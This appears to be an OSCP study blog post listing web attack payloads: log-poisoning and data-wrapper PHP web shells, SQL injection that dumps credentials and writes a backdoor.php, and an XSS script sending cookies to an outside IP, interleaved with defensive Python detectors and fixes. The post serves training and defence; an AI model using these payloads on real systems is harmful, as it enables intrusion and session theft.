OSCP notes dump: #EXPLOIT-WEB


Another blog post containing various OSCP preparation notes about web-based attacks. As always don't consider these notes to be a complete chapter about OSCP web attacks.

LFI

# basic LFI scan
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=FUZZ
# using php://filter for local file inclusion
http://example.com/index.php?m=php://filter/convert.base64-encode/resource=index
# logfile injection
# first netcat to the webserver
nc -nv <target-ip> 80
# insert code into access.log // pre preserves any line breaks/formatting
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
# execute code with
http://192.168.210.10/menu.php?file=c:\xampp\apache\logs\access.log&cmd=

PHP-Wrappers

# data wrapper - indicator (shows whether the data: wrapper is processed at all)
http://10.10.10.10/menu.php?file=data:text/plain,hello world
# exploitation
http://10.10.10.10/menu.php?file=data:text/plain,<?php echo shell_exec("dir"); ?>
# php://filter
/index.php?m=php://filter/convert.base64-encode/resource=index
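
Added example, not part of the original notes: a small Python detector for the request shapes listed in the LFI and PHP-Wrappers blocks above (path traversal, php://filter, the data: wrapper, direct reads of access.log, and PHP tags planted in the User-Agent for log poisoning), run over constructed Apache combined-format log lines. The IPs, timestamps, sizes and rule names are made up for the example; XAMPP's access.log uses the same combined format.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access.log lines (made up for this example, not from the post).
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /nav.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /nav.php?page=../../../../etc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?m=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /menu.php?file=data:text/plain,hello%20world HTTP/1.1" 200 11 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 11 "-" "<?php echo shell_exec($_GET['cmd']); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /menu.php?file=c:\xampp\apache\logs\access.log&cmd= HTTP/1.1" 200 88 "-" "Mozilla/5.0"
'''.strip().splitlines()

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rules applied to every URL-decoded query parameter value (rule names are my own).
PARAM_RULES = [
    ("path_traversal", re.compile(r'(\.\./|\.\.\\)')),
    ("php_wrapper", re.compile(r'^(php|expect|phar)://', re.I)),
    ("data_wrapper", re.compile(r'^data:', re.I)),
    ("log_or_system_file",
     re.compile(r'(access|error)\.log|/etc/passwd|drivers[\\/]etc[\\/]hosts', re.I)),
]
# Log poisoning plants PHP tags in a header that Apache writes into access.log.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_params(target):
    """(name, value) pairs of the query string; unquote() again to catch double encoding."""
    query = urlsplit(target).query
    return [(k, unquote(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def findings(rec):
    """Return a list of (rule, evidence) pairs for one parsed record."""
    out = []
    for name, value in decode_params(rec["target"]):
        for rule, rx in PARAM_RULES:
            if rx.search(value):
                out.append((rule, "%s=%s" % (name, value)))
    for field in ("ua", "referer"):
        if PHP_TAG_RE.search(rec[field]):
            out.append(("log_poisoning", "%s=%s" % (field, rec[field])))
    return out


def analyze_line(line):
    rec = parse_line(line)
    return findings(rec) if rec else []


def analyze(lines):
    """Group findings by source IP so one noisy client stands out."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for rule, evidence in findings(rec):
            hits.setdefault(rec["ip"], []).append((rule, evidence))
    return hits


if __name__ == "__main__":
    for ip, items in analyze(SAMPLE_LOG).items():
        for rule, evidence in items:
            print(ip, rule, evidence)
```

The User-Agent rule is the one worth keeping an eye on: a benign client never sends `<?php` in that header, so a single match is a strong signal that someone is staging the log-file inclusion the LFI block describes, well before the `file=...access.log` request that would trigger it.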

SQL Injection

# basic sql injection for login forms
# if the following error occurs, try limiting the results // Notice:  Trying to get property 'num_rows' of non-object in C:\xampp\htdocs\login.php on line 22
root' or 1 = 1 LIMIT 1;
# if the code still is not executed, try "commenting" out the rest of the SQL with a hash sign "#"
root' or 1 = 1 LIMIT 1;#
# using order by
# order by sorts the results of the original query by one or more columns
# before using a UNION statement, figuring out how many columns the original query returns is essential
id = 1 order by 1
id = 2 order by 2
# once an error occurs we know we have passed the number of columns
# union all
# this statement extends the original statement with, for example, an additional select query
# each select statement must return the same number of columns
# mariadb version enumeration
id=1 union all select 1, 2, @@version
# mariadb user enumeration
id=1 union all select 1, 2, user()
# getting an overview over the db with information_schema
id=1 union all select 1, 2, table_name from information_schema.tables
# selecting user and password information
id=1 union all select 1, user, password from users
# file inclusion over sql injection with the "load_file" function
id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
# code injection over sql injection with "into outfile"
id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']); ?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'
# commenting out everything after the user name field
admin'-- -
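
Added example, not from the original notes: the login query behind the "login forms" block above, once in the string-concatenated form that makes the bypass work and once parameterised, run against an in-memory SQLite table. SQLite does not know MySQL's `#` comment, so the bypasses here use the `-- -` form from the last line above; the `users` table, its rows and the function names are constructed for the example, and the vulnerable version returns None on a broken query, which is what the PHP notice about `num_rows` on a non-object corresponds to.

```python
import sqlite3


def build_db():
    """In-memory SQLite with a constructed users table (sample rows, not from the post).
    Passwords are stored in clear only to keep the demo short; real code hashes them."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret-admin"), ("root", "s3cret-root"), ("guest", "guest")],
    )
    return con


def login_vulnerable(con, username, password):
    """Concatenates user input straight into the SQL text, like the login.php the
    notes refer to. A query that no longer parses returns None, which is the
    situation behind the 'num_rows of non-object' notice quoted above."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def login_safe(con, username, password):
    """Parameterised query: the values travel separately from the SQL text, so
    quotes, OR clauses and comment markers inside them never change the statement."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run the page's payload shapes against both versions and collect the outcomes."""
    con = build_db()
    return {
        # comment out the password check entirely (the admin'-- - line above)
        "comment_bypass": login_vulnerable(con, "admin'-- -", "wrong"),
        # always-true clause plus LIMIT 1, with -- - instead of MySQL's #
        "or_true_bypass": login_vulnerable(con, "x' or 1 = 1 LIMIT 1-- -", "wrong"),
        # the same clause without the comment leaves a dangling quote: query fails
        "no_comment_errors": login_vulnerable(con, "x' or 1 = 1", "wrong"),
        # the parameterised query treats the whole string as a (non-existent) user name
        "safe_rejects": login_safe(con, "admin'-- -", "wrong"),
        "safe_accepts": login_safe(con, "admin", "s3cret-admin"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

The `no_comment_errors` case is the reason the notes say to add the comment marker: without it the injected clause leaves the original `AND password = '...'` fragment dangling, the statement fails to parse, and the application sees a failed query rather than a logged-in user. The parameterised version never reaches that point because the driver sends the values out of band.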

XSS

# stored XSS
<iframe src="http://10.10.10.10/report" height="0" width="0"></iframe>
# cookie stealing
# in case js is allowed to access the session cookie this should be possible
# the httponly flag denies js access to the cookie
<script>new Image().src="http://192.168.119.210/hacked.jpg?output="+document.cookie;</script>
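
Added example, not from the original notes: the application-side counterpart to the two payloads above, in Python. Stored comments go through `html.escape` before they are put into the page, so the iframe and script tags arrive in the browser as text, and the session cookie is issued with the HttpOnly flag the notes mention (plus Secure and SameSite, and a Content-Security-Policy header as a second layer). The comment bodies, host names, cookie value and function names are constructed for the example.

```python
import html
from http.cookies import SimpleCookie

# Constructed stored comments: one benign, two with the payload shapes from the notes.
SAMPLE_COMMENTS = [
    ("alice", "nice write-up!"),
    ("mallory", '<iframe src="http://attacker.invalid/report" height="0" width="0"></iframe>'),
    ("mallory", '<script>new Image().src="http://attacker.invalid/x?c="+document.cookie;</script>'),
]


def render_comment(author, body):
    """HTML text context: escape every user-supplied string so '<', '>', '&' and
    quotes become entities and the browser renders them instead of parsing them."""
    return '<div class="comment"><b>%s</b>: %s</div>' % (html.escape(author), html.escape(body))


def session_cookie_header(session_id):
    """Set-Cookie line for the session. HttpOnly keeps document.cookie from reading
    it, Secure restricts it to HTTPS, SameSite=Lax blunts cross-site requests."""
    c = SimpleCookie()
    c["PHPSESSID"] = session_id
    morsel = c["PHPSESSID"]
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Lax"
    morsel["path"] = "/"
    return c.output(header="Set-Cookie:")


def render_page(session_id, comments):
    """Return (headers, body) for the comment page with the defensive headers set."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        # no inline script and no framing of or by other origins
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; frame-src 'none'; frame-ancestors 'none'",
        "X-Content-Type-Options": "nosniff",
        "Set-Cookie": session_cookie_header(session_id).split(": ", 1)[1],
    }
    body = "<html><body>\n" + "\n".join(render_comment(a, b) for a, b in comments) + "\n</body></html>"
    return headers, body


if __name__ == "__main__":
    hdrs, page = render_page("constructed-session-id", SAMPLE_COMMENTS)
    for k, v in hdrs.items():
        print("%s: %s" % (k, v))
    print()
    print(page)
```

Escaping is the fix that actually removes the stored XSS; HttpOnly only limits what a successful injection can reach, which is exactly the distinction the note about the flag makes, and the CSP catches inline script that slipped past some other, unescaped output path.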

Burp Suite

# sniper
# sniper targets one payload position at a time and uses the attached wordlist for brute-forcing.
# the other position meanwhile keeps the same pre-defined word for every request.
# Example:
Admin:Pass1
Admin:Pass2
Admin:Pass3
# battering ram
# this method puts the same payload into both positions at once
# Example:
Admin:Admin
User:User
# cluster bomb
# try every combination of each payload set
# Example:
Admin:Pass1
Admin:Pass2
Admin:Pass3
Admin2:Pass1
Admin2:Pass2
Admin2:Pass3
# pitchfork
# use the same line item of each payload set together
# Example:
Admin:Pass1
User:Pass2
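
Added example, not from the original notes: the four Intruder attack types as plain Python over the payload lists from the examples above, plus the number of requests each one produces, which is the figure a defender needs when sizing an account-lockout or rate-limit threshold on a login endpoint. Sniper is implemented the way Burp runs it, cycling one payload list through each marked position in turn while the other positions keep their base value; the sniper example above shows the pass over the password position. The lists, base values and function names are constructed.

```python
from itertools import product
from math import prod


def sniper(base, payloads):
    """Sniper: one payload list, one position at a time. Position i cycles through
    the payloads while every other position keeps its base (pre-defined) value."""
    results = []
    for i in range(len(base)):
        for p in payloads:
            req = list(base)
            req[i] = p
            results.append(tuple(req))
    return results


def battering_ram(positions, payloads):
    """Battering ram: the same payload is placed into every position at once."""
    return [tuple([p] * positions) for p in payloads]


def pitchfork(payload_sets):
    """Pitchfork: line n of every set is used together; stops at the shortest set."""
    return list(zip(*payload_sets))


def cluster_bomb(payload_sets):
    """Cluster bomb: every combination of the sets (cartesian product)."""
    return list(product(*payload_sets))


def request_counts(positions, payloads, payload_sets):
    """Requests each mode sends for the given inputs; cluster bomb grows with the
    product of the list sizes, which is why it is the one a lockout policy must
    be tuned against."""
    return {
        "sniper": positions * len(payloads),
        "battering_ram": len(payloads),
        "pitchfork": min(len(s) for s in payload_sets),
        "cluster_bomb": prod(len(s) for s in payload_sets),
    }


def demo():
    """Reproduce the user:password examples from the notes (constructed lists)."""
    base = ("Admin", "Pass")  # pre-defined values in the two marked positions
    passwords = ["Pass1", "Pass2", "Pass3"]
    users_and_passwords = [["Admin", "Admin2"], passwords]
    return {
        "sniper": sniper(base, passwords),
        "battering_ram": battering_ram(len(base), ["Admin", "User"]),
        "pitchfork": pitchfork([["Admin", "User"], ["Pass1", "Pass2"]]),
        "cluster_bomb": cluster_bomb(users_and_passwords),
        "counts": request_counts(len(base), passwords, users_and_passwords),
    }


if __name__ == "__main__":
    for mode, value in demo().items():
        print(mode)
        if isinstance(value, dict):
            print("  ", value)
        else:
            for req in value:
                print("  ", ":".join(req))
```

For two positions and lists of m user names and n passwords, pitchfork tries min(m, n) pairs and cluster bomb m × n, so a lockout that triggers after a handful of failures per account stops cluster bomb cold, while a per-IP rate limit is what catches the sniper and pitchfork passes that spread failures across accounts.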